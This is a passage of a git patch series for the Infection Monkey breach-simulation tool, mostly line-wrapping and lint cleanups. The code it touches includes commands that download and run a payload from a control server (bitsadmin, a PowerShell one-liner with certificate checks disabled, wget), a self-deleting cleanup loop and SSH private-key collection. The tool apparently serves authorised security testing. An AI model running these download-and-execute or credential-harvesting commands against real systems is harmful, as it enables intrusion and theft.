a/monkey/infection_monkey/model/__init__.py b/monkey/infection_monkey/model/__init__.py index 3e333a26d..254bce966 100644 --- a/monkey/infection_monkey/model/__init__.py +++ b/monkey/infection_monkey/model/__init__.py @@ -11,11 +11,14 @@ MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG, ) GENERAL_CMDLINE_LINUX = '(cd %(monkey_directory)s && %(monkey_commandline)s)' DROPPER_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, ) MONKEY_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, ) -MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd /c %%(monkey_path)s %s"' % (MONKEY_ARG, ) -DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1' +MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd ' \ + '/c %%(monkey_path)s %s"' % (MONKEY_ARG, ) +DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(' \ + 'file_path)s exit)) > NUL 2>&1 ' # Commands used for downloading monkeys -POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\"" +POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(" \ + "monkey_path)s\' -UseBasicParsing\" " WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s" BITSADMIN_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' CHMOD_MONKEY = "chmod +x %(monkey_path)s" diff --git a/monkey/infection_monkey/monkeyfs.py b/monkey/infection_monkey/monkeyfs.py index c5ddef1aa..b65443c76 100644 --- a/monkey/infection_monkey/monkeyfs.py +++ b/monkey/infection_monkey/monkeyfs.py @@ -34,7 +34,6 @@ class VirtualFile(BytesIO): return path in VirtualFile._vfs - def getsize(path): if path.startswith(MONKEYFS_PREFIX): return VirtualFile.getsize(path) diff --git a/monkey/infection_monkey/network/firewall.py b/monkey/infection_monkey/network/firewall.py index 16af673b1..06d98dcbd 100644 --- a/monkey/infection_monkey/network/firewall.py +++ b/monkey/infection_monkey/network/firewall.py @@ -8,6 +8,7 @@ def _run_netsh_cmd(command, args): if value])), stdout=subprocess.PIPE) return cmd.stdout.read().strip().lower().endswith('ok.') + class FirewallApp(object): def is_enabled(self, **kwargs): return False @@ -83,9 +84,9 @@ class WinAdvFirewall(FirewallApp): for rule in list(self._rules.values()): if rule.get('program') == sys.executable and \ - 'in' == rule.get('dir') and \ - 'allow' == rule.get('action') and \ - 4 == len(list(rule.keys())): + 'in' == rule.get('dir') and \ + 'allow' == rule.get('action') and \ + 4 == len(list(rule.keys())): return True return False diff --git a/monkey/infection_monkey/network/httpfinger.py b/monkey/infection_monkey/network/httpfinger.py index 30292d99f..935d397d9 100644 --- a/monkey/infection_monkey/network/httpfinger.py +++ b/monkey/infection_monkey/network/httpfinger.py @@ -39,7 +39,7 @@ class HTTPFinger(HostFinger): ssl = True if 'https://' in url else False self.init_service(host.services, ('tcp-' + port[1]), port[0]) host.services['tcp-' + port[1]]['name'] = 'http' - host.services['tcp-' + port[1]]['data'] = (server,ssl) + host.services['tcp-' + port[1]]['data'] = (server, ssl) LOG.info("Port %d is open on host %s " % (port[0], host)) break # https will be the same on the same port except Timeout: diff --git a/monkey/infection_monkey/network/ping_scanner.py b/monkey/infection_monkey/network/ping_scanner.py index bf215168e..b76db8ad3 100644 --- a/monkey/infection_monkey/network/ping_scanner.py +++ b/monkey/infection_monkey/network/ping_scanner.py @@ -20,7 +20,6 @@ LOG = logging.getLogger(__name__) class PingScanner(HostScanner, HostFinger): - _SCANNED_SERVICE = '' def __init__(self): @@ -49,14 +48,12 @@ class PingScanner(HostScanner, HostFinger): if not "win32" == sys.platform: timeout /= 1000 - sub_proc = subprocess.Popen(["ping", - PING_COUNT_FLAG, - "1", - PING_TIMEOUT_FLAG, - str(timeout), host.ip_addr], - stdout=subprocess.PIPE, - stderr=subprocess.PIPE, - text=True) + sub_proc = subprocess.Popen( + ["ping", PING_COUNT_FLAG, "1", PING_TIMEOUT_FLAG, str(timeout), host.ip_addr], + stdout=subprocess.PIPE, + stderr=subprocess.PIPE, + text=True + ) output = " ".join(sub_proc.communicate()) regex_result = self._ttl_regex.search(output) diff --git a/monkey/infection_monkey/network/smbfinger.py b/monkey/infection_monkey/network/smbfinger.py index 8a267e9d1..7224e032c 100644 --- a/monkey/infection_monkey/network/smbfinger.py +++ b/monkey/infection_monkey/network/smbfinger.py @@ -30,7 +30,7 @@ class Packet: return b"".join(content_list) -##### SMB Packets ##### +# SMB Packets class SMBHeader(Packet): fields = odict([ ("proto", b"\xff\x53\x4d\x42"), @@ -92,7 +92,13 @@ class SMBSessionFingerData(Packet): ("capabilities", b"\xd4\x00\x00\xa0"), ("bcc1", ""), ("Data", - b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"), + b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02" + b"\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00" + b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f" + b"\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63" + b"\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00" + b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35" + b"\x00\x2e\x00\x31\x00\x00\x00\x00\x00"), ]) diff --git a/monkey/infection_monkey/network/tcp_scanner.py b/monkey/infection_monkey/network/tcp_scanner.py index 2ea88842f..fa2d812ae 100644 --- a/monkey/infection_monkey/network/tcp_scanner.py +++ b/monkey/infection_monkey/network/tcp_scanner.py @@ -25,7 +25,8 @@ class TcpScanner(HostScanner, HostFinger): Scans a target host to see if it's alive using the tcp_target_ports specified in the configuration. :param host: VictimHost structure :param only_one_port: Currently unused. - :return: T/F if there is at least one open port. In addition, the host object is updated to mark those services as alive. + :return: T/F if there is at least one open port. + In addition, the host object is updated to mark those services as alive. """ # maybe hide under really bad detection systems diff --git a/monkey/infection_monkey/system_info/SSH_info_collector.py b/monkey/infection_monkey/system_info/SSH_info_collector.py index 60c509fc6..31afdb8ed 100644 --- a/monkey/infection_monkey/system_info/SSH_info_collector.py +++ b/monkey/infection_monkey/system_info/SSH_info_collector.py @@ -63,7 +63,7 @@ class SSHCollector(object): LOG.info("Found public key in %s" % public) try: with open(public) as f: - info['public_key'] = f.read() + info['public_key'] = f.read() # By default private key has the same name as public, only without .pub private = os.path.splitext(public)[0] if os.path.exists(private): diff --git a/monkey/infection_monkey/transport/base.py b/monkey/infection_monkey/transport/base.py index e6a5bc366..a02d86708 100644 --- a/monkey/infection_monkey/transport/base.py +++ b/monkey/infection_monkey/transport/base.py @@ -27,4 +27,4 @@ def update_last_serve_time(): def get_last_serve_time(): global g_last_served - return g_last_served \ No newline at end of file + return g_last_served diff --git a/monkey/monkey_island/cc/models/test_monkey.py b/monkey/monkey_island/cc/models/test_monkey.py index 472c5770b..a7f6f90da 100644 --- a/monkey/monkey_island/cc/models/test_monkey.py +++ b/monkey/monkey_island/cc/models/test_monkey.py @@ -84,7 +84,7 @@ class TestMonkey(IslandTestCase): self.clean_monkey_db() linux_monkey = Monkey(guid=str(uuid.uuid4()), - description="Linux shay-Virtual-Machine 4.15.0-50-generic #54-Ubuntu SMP Mon May 6 18:46:08 UTC 2019 x86_64 x86_64") + description="Linux shay-Virtual-Machine 4.15.0-50-generic #54-Ubuntu") windows_monkey = Monkey(guid=str(uuid.uuid4()), description="Windows bla bla bla") unknown_monkey = Monkey(guid=str(uuid.uuid4()), diff --git a/monkey/monkey_island/cc/resources/root.py b/monkey/monkey_island/cc/resources/root.py index d7cae8bd7..59a8fbe7c 100644 --- a/monkey/monkey_island/cc/resources/root.py +++ b/monkey/monkey_island/cc/resources/root.py @@ -1,18 +1,18 @@ -from datetime import datetime import logging import threading +from datetime import datetime import flask_restful from flask import request, make_response, jsonify from monkey_island.cc.auth import jwt_required from monkey_island.cc.database import mongo +from monkey_island.cc.services.database import Database from monkey_island.cc.services.node import NodeService from monkey_island.cc.services.reporting.report import ReportService -from monkey_island.cc.services.attack.attack_report import AttackReportService -from monkey_island.cc.services.reporting.report_generation_synchronisation import is_report_being_generated, safe_generate_reports +from monkey_island.cc.services.reporting.report_generation_synchronisation import is_report_being_generated, \ + safe_generate_reports from monkey_island.cc.utils import local_ip_addresses -from monkey_island.cc.services.database import Database __author__ = 'Barak' diff --git a/monkey/monkey_island/cc/services/attack/attack_report.py b/monkey/monkey_island/cc/services/attack/attack_report.py index f88b7e8b9..1c18f7654 100644 --- a/monkey/monkey_island/cc/services/attack/attack_report.py +++ b/monkey/monkey_island/cc/services/attack/attack_report.py @@ -75,7 +75,10 @@ class AttackReportService: Gets timestamp of latest attack telem :return: timestamp of latest attack telem """ - return [x['timestamp'] for x in mongo.db.telemetry.find({'telem_category': 'attack'}).sort('timestamp', -1).limit(1)][0] + return [ + x['timestamp'] for x in + mongo.db.telemetry.find({'telem_category': 'attack'}).sort('timestamp', -1).limit(1) + ][0] @staticmethod def get_latest_report(): diff --git a/monkey/monkey_island/cc/services/config.py b/monkey/monkey_island/cc/services/config.py index 2d38b6498..09771302d 100644 --- a/monkey/monkey_island/cc/services/config.py +++ b/monkey/monkey_island/cc/services/config.py @@ -122,11 +122,16 @@ class ConfigService: @staticmethod def ssh_add_keys(public_key, private_key, user, ip): - if not ConfigService.ssh_key_exists(ConfigService.get_config_value(['internal', 'exploits', 'exploit_ssh_keys'], - False, False), user, ip): - ConfigService.add_item_to_config_set('internal.exploits.exploit_ssh_keys', - {"public_key": public_key, "private_key": private_key, - "user": user, "ip": ip}) + if not ConfigService.ssh_key_exists( + ConfigService.get_config_value(['internal', 'exploits', 'exploit_ssh_keys'], False, False), user, ip): + ConfigService.add_item_to_config_set( + 'internal.exploits.exploit_ssh_keys', + { + "public_key": public_key, + "private_key": private_key, + "user": user, "ip": ip + } + ) @staticmethod def ssh_key_exists(keys, user, ip): diff --git a/monkey/monkey_island/cc/services/remote_run_aws.py b/monkey/monkey_island/cc/services/remote_run_aws.py index 77b6d95ea..4ec1fd427 100644 --- a/monkey/monkey_island/cc/services/remote_run_aws.py +++ b/monkey/monkey_island/cc/services/remote_run_aws.py @@ -131,7 +131,7 @@ class RemoteRunAwsService: return r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {" \ r"$true}; (New-Object System.Net.WebClient).DownloadFile('https://" + island_ip + \ r":5000/api/monkey/download/monkey-windows-" + bit_text + r".exe','.\\monkey.exe'); " \ - r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; " + r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; " @staticmethod def _get_run_monkey_cmd_line(is_linux, is_64bit, island_ip): diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py index 8690f6ee1..f0b6bdb6a 100644 --- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py +++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py @@ -148,8 +148,8 @@ class AWSExporter(Exporter): severity=5, title="Weak segmentation - Machines were able to communicate over unused ports.", description="Use micro-segmentation policies to disable communication other than the required.", - recommendation="Machines are not locked down at port level. Network tunnel was set up from {0} to {1}" - .format(issue['machine'], issue['dest']), + recommendation="Machines are not locked down at port level. " + "Network tunnel was set up from {0} to {1}".format(issue['machine'], issue['dest']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -160,10 +160,12 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=10, title="Samba servers are vulnerable to 'SambaCry'", - description="Change {0} password to a complex one-use password that is not shared with other computers on the network. Update your Samba server to 4.4.14 and up, 4.5.10 and up, or 4.6.4 and up." \ - .format(issue['username']), - recommendation="The machine {0} ({1}) is vulnerable to a SambaCry attack. The Monkey authenticated over the SMB protocol with user {2} and its password, and used the SambaCry vulnerability.".format( - issue['machine'], issue['ip_address'], issue['username']), + description="Change {0} password to a complex one-use password that is not shared with other computers on the " + "network. Update your Samba server to 4.4.14 and up, " + "4.5.10 and up, or 4.6.4 and up.".format(issue['username']), + recommendation="The machine {0} ({1}) is vulnerable to a SambaCry attack. The Monkey authenticated over the SMB " + "protocol with user {2} and its password, and used the SambaCry " + "vulnerability.".format(issue['machine'], issue['ip_address'], issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -174,10 +176,10 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=5, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", - description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format( - issue['username']), - recommendation="The machine {0}({1}) is vulnerable to a SMB attack. The Monkey used a pass-the-hash attack over SMB protocol with user {2}.".format( - issue['machine'], issue['ip_address'], issue['username']), + description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " + "network.".format(issue['username']), + recommendation="The machine {0}({1}) is vulnerable to a SMB attack. The Monkey used a pass-the-hash attack over " + "SMB protocol with user {2}.".format(issue['machine'], issue['ip_address'], issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -188,10 +190,11 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.", - description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format( - issue['username']), - recommendation="The machine {0} ({1}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH protocol with user {2} and its password.".format( - issue['machine'], issue['ip_address'], issue['username']), + description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " + "network.".format(issue['username']), + recommendation="The machine {0} ({1}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH" + " protocol with user {2} and its " + "password.".format(issue['machine'], issue['ip_address'], issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -203,8 +206,11 @@ class AWSExporter(Exporter): severity=1, title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.", description="Protect {ssh_key} private key with a pass phrase.".format(ssh_key=issue['ssh_key']), - recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH protocol with private key {ssh_key}.".format( - machine=issue['machine'], ip_address=issue['ip_address'], ssh_key=issue['ssh_key']), + recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated " + "over the SSH protocol with private key {ssh_key}.".format( + machine=issue['machine'], + ip_address=issue['ip_address'], + ssh_key=issue['ssh_key']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -216,8 +222,10 @@ class AWSExporter(Exporter): severity=10, title="Elastic Search servers are vulnerable to CVE-2015-1427", description="Update your Elastic Search server to version 1.4.3 and up.", - recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made possible because the Elastic Search server was not patched against CVE-2015-1427.".format( - issue['machine'], issue['ip_address']), + recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made " + "possible because the Elastic Search server was not patched against CVE-2015-1427.".format( + issue['machine'], + issue['ip_address']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -228,13 +236,13 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Weak segmentation - Machines from different segments are able to communicate.", - description="Segment your network and make sure there is no communication between machines from different segments.", + description="Segment your network and make sure there is no communication between machines from different " + "segments.", recommendation="The network can probably be segmented. A monkey instance on \ {0} in the networks {1} \ could directly access the Monkey Island server in the networks {2}.".format(issue['machine'], issue['networks'], - issue[ - 'server_networks']), + issue['server_networks']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -259,8 +267,9 @@ class AWSExporter(Exporter): title="Machines are vulnerable to 'Shellshock'", description="Update your Bash to a ShellShock-patched version.", recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. " - "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a shell injection attack on the paths: {3}.".format( - issue['machine'], issue['ip_address'], issue['port'], issue['paths']), + "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a " + "shell injection attack on the paths: {3}.".format( + issue['machine'], issue['ip_address'], issue['port'], issue['paths']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -271,10 +280,13 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", - description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format( - issue['username']), - recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB protocol with user {2} and its password.".format( - issue['machine'], issue['ip_address'], issue['username']), + description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " + "network.".format(issue['username']), + recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB " + "protocol with user {2} and its password.".format( + issue['machine'], + issue['ip_address'], + issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -285,9 +297,13 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", - description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.", - recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over the WMI protocol with user {username} and its password.".format( - machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']), + description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " + "network.", + recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over " + "the WMI protocol with user {username} and its password.".format( + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -298,10 +314,13 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", - description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format( - issue['username']), - recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey used a pass-the-hash attack over WMI protocol with user {username}".format( - machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']), + description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " + "network.".format(issue['username']), + recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey used a " + "pass-the-hash attack over WMI protocol with user {username}".format( + machine=issue['machine'], + ip_address=issue['ip_address'], + username=issue['username']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -325,9 +344,10 @@ class AWSExporter(Exporter): return AWSExporter._build_generic_finding( severity=1, title="Shared local administrator account - Different machines have the same account as a local administrator.", - description="Make sure the right administrator accounts are managing the right machines, and that there isn\'t an unintentional local admin sharing.", - recommendation="Here is a list of machines which the account {username} is defined as an administrator: {shared_machines}".format( - username=issue['username'], shared_machines=issue['shared_machines']), + description="Make sure the right administrator accounts are managing the right machines, and that there isn\'t " + "an unintentional local admin sharing.", + recommendation="Here is a list of machines which the account {username} is defined as an administrator: " + "{shared_machines}".format(username=issue['username'], shared_machines=issue['shared_machines']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -339,8 +359,9 @@ class AWSExporter(Exporter): severity=1, title="Mimikatz found login credentials of a user who has admin access to a server defined as critical.", description="This critical machine is open to attacks via strong users with access to it.", - recommendation="The services: {services} have been found on the machine thus classifying it as a critical machine. These users has access to it:{threatening_users}.".format( - services=issue['services'], threatening_users=issue['threatening_users']), + recommendation="The services: {services} have been found on the machine thus classifying it as a critical " + "machine. These users has access to it:{threatening_users}.".format( + services=issue['services'], threatening_users=issue['threatening_users']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -353,8 +374,8 @@ class AWSExporter(Exporter): title="Struts2 servers are vulnerable to remote code execution.", description="Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.", recommendation="Struts2 server at {machine} ({ip_address}) is vulnerable to remote code execution attack." - " The attack was made possible because the server is using an old version of Jakarta based file upload Multipart parser.".format( - machine=issue['machine'], ip_address=issue['ip_address']), + "The attack was made possible because the server is using an old version of Jakarta based file " + "upload Multipart parser.".format(machine=issue['machine'], ip_address=issue['ip_address']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) @@ -368,8 +389,8 @@ class AWSExporter(Exporter): description="Install Oracle critical patch updates. Or update to the latest version. " \ "Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", recommendation="Oracle WebLogic server at {machine} ({ip_address}) is vulnerable to remote code execution attack." - " The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware (subcomponent: WLS Security).".format( - machine=issue['machine'], ip_address=issue['ip_address']), + "The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware " + "(subcomponent: WLS Security).".format(machine=issue['machine'], ip_address=issue['ip_address']), instance_arn=instance_arn, instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None ) diff --git a/monkey/monkey_island/cc/services/reporting/pth_report.py b/monkey/monkey_island/cc/services/reporting/pth_report.py index 5e77b6395..ecb209c69 100644 --- a/monkey/monkey_island/cc/services/reporting/pth_report.py +++ b/monkey/monkey_island/cc/services/reporting/pth_report.py @@ -30,7 +30,6 @@ class PTHReportService(object): } """ - pipeline = [ {"$match": { 'NTLM_secret': { @@ -55,7 +54,7 @@ class PTHReportService(object): :param admin_on_machines: A list of "monkey" documents "_id"s :param domain_name: The admins' domain name :return: - A list of formatted machines names *domain*\*hostname*, to use in shared admins issues. + A list of formatted machines names *domain*/*hostname*, to use in shared admins issues. """ machines = mongo.db.monkey.find({'_id': {'$in': admin_on_machines}}, {'hostname': 1}) return [domain_name + '\\' + i['hostname'] for i in list(machines)] @@ -108,7 +107,7 @@ class PTHReportService(object): 'username': user['name'], 'domain_name': user['domain_name'], 'hostname': NodeService.get_hostname_by_id(ObjectId(user['machine_id'])) if user['machine_id'] else None - } for user in doc['Docs'] + } for user in doc['Docs'] ] users_cred_groups.append({'cred_groups': users_list}) @@ -144,7 +143,8 @@ class PTHReportService(object): { 'name': admin['name'], 'domain_name': admin['domain_name'], - 'admin_on_machines': PTHReportService.__get_admin_on_machines_format(admin['admin_on_machines'], admin['domain_name']) + 'admin_on_machines': PTHReportService.__get_admin_on_machines_format(admin['admin_on_machines'], + admin['domain_name']) } for admin in admins ] @@ -153,11 +153,11 @@ class PTHReportService(object): admins_info = PTHReportService.get_shared_admins_nodes() return [ { - 'is_local': False, - 'type': 'shared_admins_domain', - 'machine': admin['domain_name'], - 'username': admin['domain_name'] + '\\' + admin['name'], - 'shared_machines': admin['admin_on_machines'], + 'is_local': False, + 'type': 'shared_admins_domain', + 'machine': admin['domain_name'], + 'username': admin['domain_name'] + '\\' + admin['name'], + 'shared_machines': admin['admin_on_machines'], } for admin in admins_info] @@ -262,7 +262,7 @@ class PTHReportService(object): return { 'nodes': PTHReportService.generate_map_nodes(), 'edges': PTHReportService.generate_edges() - } + } @staticmethod def get_report(): @@ -283,4 +283,3 @@ class PTHReportService(object): } return report - diff --git a/monkey/monkey_island/cc/utils.py b/monkey/monkey_island/cc/utils.py index cf59ae7df..58dff1f5a 100644 --- a/monkey/monkey_island/cc/utils.py +++ b/monkey/monkey_island/cc/utils.py @@ -65,11 +65,18 @@ def local_ip_addresses(): # The subnets list should not change often. Therefore, we can cache the result and never call this function # more than once. This stopgap measure is here since this function is called a lot of times during the report # generation. -# This means that if the interfaces or subnets of the Island machine change, the Island process needs to be restarted. +# This means that if the interfaces or subnets of the Island machine change, the Island process needs to be restarted. @lru(maxsize=1) def get_subnets(): subnets = [] for interface in interfaces(): addresses = ifaddresses(interface).get(AF_INET, []) - subnets.extend([ipaddress.ip_interface(link['addr'] + '/' + link['netmask']).network for link in addresses if link['addr'] != '127.0.0.1']) + subnets.extend( + [ + ipaddress.ip_interface(link['addr'] + '/' + link['netmask']).network + for link + in addresses + if link['addr'] != '127.0.0.1' + ] + ) return subnets From 4b0ea4aed7629636158eb729cc112e56aa6cd904 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 16:15:31 +0200 Subject: [PATCH 25/44] Variable names and const location fixes --- monkey/infection_monkey/control.py | 2 +- monkey/infection_monkey/dropper.py | 5 +++-- monkey/infection_monkey/network/firewall.py | 6 +++--- monkey/infection_monkey/network/info.py | 11 +++++------ monkey/infection_monkey/transport/http.py | 10 ++++------ monkey/monkey_island/cc/environment/environment.py | 4 ++-- monkey/monkey_island/cc/models/monkey.py | 2 +- monkey/monkey_island/cc/services/config.py | 12 ++++++------ monkey/monkey_island/cc/services/edge.py | 6 +++--- monkey/monkey_island/cc/services/node.py | 6 +++--- 10 files changed, 31 insertions(+), 33 deletions(-) diff --git a/monkey/infection_monkey/control.py b/monkey/infection_monkey/control.py index 54d528976..b063744ad 100644 --- a/monkey/infection_monkey/control.py +++ b/monkey/infection_monkey/control.py @@ -304,7 +304,7 @@ class ControlClient(object): try: target_addr, target_port = my_proxy.split(':', 1) target_port = int(target_port) - except: + except ValueError: return None else: proxy_class = HTTPConnectProxy diff --git a/monkey/infection_monkey/dropper.py b/monkey/infection_monkey/dropper.py index ee1194035..0fc6dd10a 100644 --- a/monkey/infection_monkey/dropper.py +++ b/monkey/infection_monkey/dropper.py @@ -26,6 +26,7 @@ else: try: WindowsError except NameError: + # noinspection PyShadowingBuiltins WindowsError = IOError __author__ = 'itamar' @@ -103,14 +104,14 @@ class MonkeyDrops(object): dropper_date_reference_path = WormConfiguration.dropper_date_reference_path_linux try: ref_stat = os.stat(dropper_date_reference_path) - except OSError as exc: + except OSError: LOG.warning("Cannot set reference date using '%s', file not found", dropper_date_reference_path) else: try: os.utime(self._config['destination_path'], (ref_stat.st_atime, ref_stat.st_mtime)) - except: + except OSError: LOG.warning("Cannot set reference date to destination file") monkey_options =\ diff --git a/monkey/infection_monkey/network/firewall.py b/monkey/infection_monkey/network/firewall.py index 06d98dcbd..3b0161bbb 100644 --- a/monkey/infection_monkey/network/firewall.py +++ b/monkey/infection_monkey/network/firewall.py @@ -25,7 +25,7 @@ class FirewallApp(object): def __enter__(self): return self - def __exit__(self, type, value, traceback): + def __exit__(self, exc_type, value, traceback): self.close() def close(self): @@ -49,9 +49,9 @@ class WinAdvFirewall(FirewallApp): except: return None - def add_firewall_rule(self, name="Firewall", dir="in", action="allow", program=sys.executable, **kwargs): + def add_firewall_rule(self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs): netsh_args = {'name': name, - 'dir': dir, + 'dir': direction, 'action': action, 'program': program} netsh_args.update(kwargs) diff --git a/monkey/infection_monkey/network/info.py b/monkey/infection_monkey/network/info.py index cc198312c..2d7b981f5 100644 --- a/monkey/infection_monkey/network/info.py +++ b/monkey/infection_monkey/network/info.py @@ -16,6 +16,11 @@ from infection_monkey.utils.environment 